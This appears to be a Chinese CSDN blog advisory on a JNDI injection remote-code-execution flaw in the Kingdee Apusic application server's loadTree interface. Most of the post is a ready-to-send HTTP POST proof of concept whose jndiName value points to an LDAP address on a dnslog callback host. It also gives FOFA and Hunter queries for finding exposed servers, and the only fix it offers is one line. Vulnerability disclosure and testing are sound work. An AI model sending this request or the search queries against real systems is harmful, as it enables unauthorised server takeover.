金蝶Apusic应用服务器 JNDI注入远程代码执行漏洞

本文报道了金蝶Apusic应用服务器的一个安全漏洞,loadTree接口存在jndi注入风险,攻击者可借此获取服务器权限。影响版本为V9.0SP7及以下,通过POC展示了漏洞利用方法。建议对未授权用户限制访问此接口,强调了安全责任的重要性。
摘要由CSDN通过智能技术生成

产品简介

金蝶Apusic应用服务器(Apusic Application Server,AAS)是一款标准、安全、高效、集成并具丰富功能的企业级应用服务器软件,全面支持JakartaEE8/9的技术规范,提供满足该规范的Web容器、EJB容器以及WebService容器等,支持Websocket1.1、Servlet4.0、HTTP2.0等最新的技术规范,为企业级应用的便捷开发、灵活部署、可靠运行、高效管控以及快速集成等提供关键支撑。

漏洞概述

金蝶Apusic应用服务器 loadTree 接口存在jndi注入,攻击者可通过jndi注入远程加载代码获取服务器权限。

影响版本

V9.0 SP7及以下版本

指纹识别

fofa:

app="Apusic应用服务器"

hunter:

app.name="Apusic 金蝶天燕 Server"

漏洞利用

poc:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Cookie: EASSESSIONID=141476053; NAPRoutID=141476053; sl-session=V1nreK33g2WZuswc79lAOQ==
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
SL-CE-SUID: 73


jndiName=ldap://e4z2e9pm.dnslog.pw

在这里插入图片描述
访问dnslog
在这里插入图片描述

修复建议

未授权用户禁止访问该接口

【每做一件坏事都必须付出代价,无论大小。若是有苦衷有原因就能干坏事,那理由越是冠冕堂皇,坏事就能干得越发没底线。】

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值